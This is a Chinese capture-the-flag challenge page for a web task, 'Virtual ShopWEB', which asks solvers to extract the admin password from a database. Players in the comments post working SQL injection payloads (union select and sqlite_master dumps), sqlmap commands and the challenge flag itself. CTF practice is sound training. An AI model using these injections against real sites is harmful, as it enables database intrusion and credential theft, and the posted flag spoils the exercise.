Virtual ShopWEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
heyile
一血奖励:
0金币
解 决:
456
提 示:
描 述:
So, let's see if you can retrieve the `password` of the admin which\
\ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\
\ F100w"
评分(0)
暂无评分
解题动态
asdliuyan 攻破了该题 12小时前
Thr0ne 攻破了该题 1天前
houst 攻破了该题 2天前
Kakivare 攻破了该题 8天前
晴空LMDK 攻破了该题 11天前
Zhengzanmei 攻破了该题 12天前
yexiaoye 攻破了该题 16天前
Q@vqi 攻破了该题 17天前
GDGZ_CTF 攻破了该题 24天前
nickhu 攻破了该题 26天前
Q-Larry 攻破了该题 26天前
HamiLemon 攻破了该题 1月前
tom0528 攻破了该题 1月前
tenwool 攻破了该题 1月前
bant 攻破了该题 1月前
lalala2022 攻破了该题 1月前
lola 攻破了该题 1月前
pigpigG6768 攻破了该题 1月前
hsk_zy 攻破了该题 1月前
评论
tenwool 1月前
举报
这个判断逻辑是只要查密码就出flag,所以最简单的就是union select 1,2,3,password from users --+直接就出来了
tenwool 1月前
举报
搞了半天没做出来,原来提示里全都给了. order by 查出4列 union select 1,2,3,4 发现第二列不回显,提示又让找密码,直接 union select (select password from users where username='admin'),2,3,4 --+,出flag
tdwj 9月前
举报
一开始' union select 1,2,database(),4--+报错,看提示' union select 1,2,username,password from users--+倒是可出flag
欧尼酱001 1年前
举报
1、将请求包保存为1.txt 2、python3 sqlmap.py -r 1.txt --batch --tables 3、python3 sqlmap.py -r 1.txt --batch -T users --dump 即可跑出表字段:shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}
WCRH 1年前
举报
这又不是post请求,你还保存上txt了
.⎛⎝•̀ω•́⎠⎞. 2年前
举报
只用sqlmap就可以做出来,很简单的一个注入
FADogeCTF 2年前
举报
union查询
xiaobai568 2年前
举报
前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了
JJhello 2年前
举报
sqlmap即可
chaoge 2年前
举报
sqlite,弄了半天认为是MySQL呢。
justsosoloveyou 2年前
举报
' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+